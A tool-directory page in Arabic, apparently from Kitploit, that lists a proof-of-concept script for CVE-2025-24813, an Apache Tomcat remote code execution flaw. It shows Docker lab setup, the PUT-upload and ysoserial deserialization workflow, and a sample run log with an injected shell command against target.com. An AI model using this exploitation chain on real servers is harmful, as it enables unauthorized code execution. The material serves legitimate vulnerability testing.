Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24813 — سكربت إثبات المفهوم (PoC) لـ CVE-2025-24813، ثغرة أمنية في Apache Tomcat. | Kitploit
أدوات/GitHubGitHub/hakankarabacak/cve-2025-24813
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعدتطوير الحمولات
GitHubhakankarabacak/cve-2025-24813

CVE-2025-24813

سكربت إثبات المفهوم (PoC) لـ CVE-2025-24813، ثغرة أمنية في Apache Tomcat.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-24813

سكربت إثبات المفهوم (PoC) لثغرة CVE-2025-24813، وهي ثغرة في Apache Tomcat.

تم تعديل السكربت بناءً على الرابط ذي الصلة وتهيئته وفقًا لاحتياجاتي.

إعداد بيئة Tomcat القابلة للاستغلال

تعتمد البيئة على الصورة الرسمية Tomcat 9.0.90. تزيل قيد القراءة فقط للخادم وتضبطه لحفظ بيانات الجلسة على القرص. ثم تنشر التطبيق تلقائيًا عن طريق نسخ ملف ROOT.war إلى دليل webapps/ الخاص بـ Tomcat.

root@kitploit:~
docker build -t cve-2025-24813 .
docker run --name cve-2025-24813 -it -d -p 8080:8080 cve-2025-24813

سير العمل

  1. يتم وضع ملف check.txt مع ترويسة Content-Range للتحقق مما إذا كان الخادم يقبل طلبات PUT.
  2. إذا كان الخادم قابلاً للكتابة، يتم إنشاء حمولة (payload) للأمر المطلوب باستخدام ysoserial.
  3. يتم رفع ملف الجلسة الخبيث إلى الدليل عبر طلب PUT، وربطه بمعرّف الجلسة (Session ID) واسم الملف (FileName).
  4. يتم إرسال طلب GET مع JSESSIONID مخصص، مما يؤدي إلى إلغاء تسلسل البيانات (deserialization).
  5. يتم حذف ملف الحمولة المؤقت من الدليل.

الاستخدام

root@kitploit:~
$ python3 cve_2025_24813.py

██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ███████╗      ██████╗ ██╗  ██╗ █████╗  ██╗██████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██╔════╝      ╚════██╗██║  ██║██╔══██╗███║╚════██╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████╗█████╗ █████╔╝███████║╚█████╔╝╚██║ █████╔╝
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝██╔═══╝ ╚════██║██╔══██╗ ██║ ╚═══██╗
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗███████║      ███████╗     ██║╚█████╔╝ ██║██████╔╝
╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚══════╝      ╚══════╝     ╚═╝ ╚════╝  ╚═╝╚═════╝
 
                 --- Apache Tomcat Remote Code Execution PoC by Hakan Karabacak ---

Enter target URL (e.g., http://target.com:8080): http://target.com:8080
Enter command to execute (default: bash -c echo${IFS}$(id)>/tmp/RCE): 
Enter path to ysoserial.jar (default: ysoserial.jar): 
Enter ysoserial gadget chain (default: CommonsCollections6): 
[*] Session ID: hk1337
[+] Server is writable via PUT: http://target.com:8080/check.txt
[*] Generating ysoserial payload for command: bash -c echo${IFS}$(id)>/tmp/RCE
[+] Payload generated successfully: payload.ser
[+] Payload uploaded with status 409 (Conflict): http://target.com:8080/hk1337.session
[+] Exploit succeeded! Server returned 500 after deserialization.
[+] Target http://target.com:8080 is vulnerable to CVE-2025-24813!
[+] Temporary file removed: payload.ser

PoC

https://github.com/user-attachments/assets/5a271e6f-1126-459a-852b-603f39a68616

تنزيل الأداة